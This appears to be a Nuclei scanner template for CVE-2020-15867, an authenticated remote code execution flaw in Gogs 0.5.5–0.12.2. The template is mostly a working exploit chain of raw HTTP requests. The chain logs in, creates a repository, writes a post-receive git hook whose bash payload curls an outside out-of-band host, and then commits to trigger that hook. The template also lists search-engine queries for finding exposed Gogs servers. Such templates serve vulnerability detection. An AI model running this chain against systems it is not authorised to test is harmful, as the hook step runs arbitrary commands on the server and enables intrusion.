Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
PoC代码[已公开]
id: CVE-2020-15867
info:
name: Gogs 0.5.5 - 0.12.2 - Remote Code Execution
author: theamanrawat
severity: high
description: |
Gogs 0.5.5 through 0.12.2 is susceptible to authenticated remote code execution via the git hooks functionality. There can be a privilege escalation if access to this feature is granted to a user who does not have administrative privileges. NOTE: Since this is mentioned in the documentation but not in the UI, it could be considered a "product UI does not warn user of unsafe actions" issue.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Upgrade Gogs to a version that is not affected by the vulnerability (0.12.3 or later).
reference:
- https://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
- https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
- http://packetstormsecurity.com/files/162123/Gogs-Git-Hooks-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-15867
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-15867
epss-score: 0.91102
epss-percentile: 0.99631
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 7
vendor: gogs
product: gogs
shodan-query:
- cpe:"cpe:2.3:a:gogs:gogs"
- http.title:"sign in - gogs"
fofa-query: title="sign in - gogs"
google-query: intitle:"sign in - gogs"
tags: cve,cve2020,rce,gogs,git,authenticated,packetstorm,intrusive
http:
- raw:
- |
GET /user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
- |
GET /repo/create HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on
- |
POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}
- |
GET /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
- |
POST /{{username}}/{{randstr}}/_new/master HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- http
- type: word
part: body_1
words:
- content="Gogs
extractors:
- type: regex
name: csrf
group: 1
regex:
- name="_csrf" value="(.*)"
internal: true
- type: regex
name: auth_csrf
group: 1
regex:
- name="_csrf" content="(.*)"
internal: true
- type: regex
name: last_commit
group: 1
regex:
- name="last_commit" value="(.*)"
internal: true
# digest: 4a0a00473045022100fdefcfa6fee56fd1932fac80e33579169d6e919210b523839aea246d856bc80a02202bfd027f0c5e8f56eabe2de4acc99f6fffcad14f089457d8a30d7e33e74a5c18:922c64590222798bb761d5b6d8e72950